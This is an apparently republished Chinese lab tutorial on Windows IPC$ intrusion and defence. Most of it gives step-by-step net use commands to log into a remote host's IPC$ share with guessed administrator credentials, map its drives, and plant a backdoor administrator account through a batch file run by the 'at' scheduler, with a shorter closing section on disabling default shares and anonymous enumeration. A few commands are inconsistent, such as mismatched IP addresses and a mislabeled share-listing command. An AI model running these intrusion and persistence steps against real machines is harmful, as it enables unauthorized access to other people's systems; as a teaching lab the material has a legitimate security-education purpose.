西西软件园多重安全检测下载网站、值得信赖的软件下载站!
软件
软件
文章
搜索

首页安全中心黑客攻防 → IPC$入侵方法及防范

IPC$入侵方法及防范

相关软件相关文章发表评论 来源:本站整理时间:2011/2/18 21:50:49字体大小:A-A+

作者:佚名点击:265次评论:0次标签: 入侵

  • 类型:休闲益智大小:34.1M语言:中文 评分:10.0
  • 标签:
立即下载
 实验概述
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是Windows NT的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
设置IPC$的初衷是为了方便管理员的管理,当该功能切被大量用于网络入侵。默认情况下IPC$是已被共享的,除非手动删除了IPC$。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。
如何查找IPC$漏洞主机?可以使用“流光2000”等软件(http://sec.chinabyte.com/327/9143827.shtml)。
2.1.2 IPC$入侵故障处理
(1)使用IPC$连接失败时,首先考虑一下几点:
远程主机操作系统可能不是Windows NT/2000/XP/2003
远程主机可能删除了IPC$共享
远程主机未开启139或445端口(或防火墙)
查看帮助:net use /?

2.1.3 实验步骤
任务一:利用已知的系统账号和密码进行入侵
假设已经找到了一台这样的主机,地址是202.201.244.100,管理员帐号是Administrator,密码是123456。
(1)开始菜单中进入“命令提示符”窗口。
(2)建立IPC$连接,命令格式为:
net use \\202.201.244.99\ipc$ “123456” /user: “Administrator”
连接成功后,将显示“命令成功完成”的提示信息。
(3)进行网络驱动器映射,将远程主机上的D$映射为本地的G盘。
net use G:\\202.201.244.99\D$
(4)删除网络连接
net use * /del
任务二:在对方系统上留下后门
在远程主机上创建一个后门账号以备将来登陆时使用,编写一个可在远程主机上可以自动运行的文件(例如:批处理文件),利用远程主机的Windows计划任务功能实现远程入侵。
(1)创建一个批处理文件(保存为sysdoor.bat),名为sysdoor的用户账号,密码为123456,并将其加入到administrators(系统管理员组中)。
net user sysdoor 123456 /add
net localgroup administrators sysdoor /add
(2)建立与远程主机的IPC$连接
net use \\202.201.244.99\ipc$ “123456” /user: “Administrator”
(3)将已创建的批处理文件复制到远程主机上
copy sysdoor.bat \\202.201.244.100\d$
(4)利用Windows计划任务定期执行批处理文件
查看远程主机上当前系统时间:net time \\202.201.244.100
让系统在14:00时运行批处理文件:
at \\202.201.244.100 14:00 d:\sysdoor.bat
(5)断开与远程主机上的IPC$连接
net use * /del
(6)在14:00以后,尝试使用sysdoor账号就行IPC$连接。

备注:也可以直接将对方的guest用户账号激活
net user guest /active
net user guest 123456
net localgroup administrators guest /add

任务三:防御IPC$入侵
(1)禁止在连接中进行枚举攻击
运行“regedit”命令,打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa,把restrictanonymoussam的值改为1,如下图所示。



(2)禁止默认共享
首先查看共享资源:net share ipc$ /del
删除IPC$共享:net share ipc$ /del
删除admin$共享:net share admin$ /del
删除d$共享:net share d$ /del

备注:添加共享net share c$=c:\
net share d$=d:\

(3)停止Server服务
Net stop server

    相关评论

    阅读本文后您有什么感想? 已有人给出评价!

    • 8 喜欢喜欢
    • 3 顶
    • 1 难过难过
    • 5 囧
    • 3 围观围观
    • 2 无聊无聊

    热门评论

    最新评论

    发表评论 查看所有评论(0)

    昵称:
    表情: 高兴 可 汗 我不要 害羞 好 下下下 送花 屎 亲亲
    字数: 0/500 (您的评论需要经过审核才能显示)
    推荐文章

    没有数据

      没有数据
    最新文章
      没有数据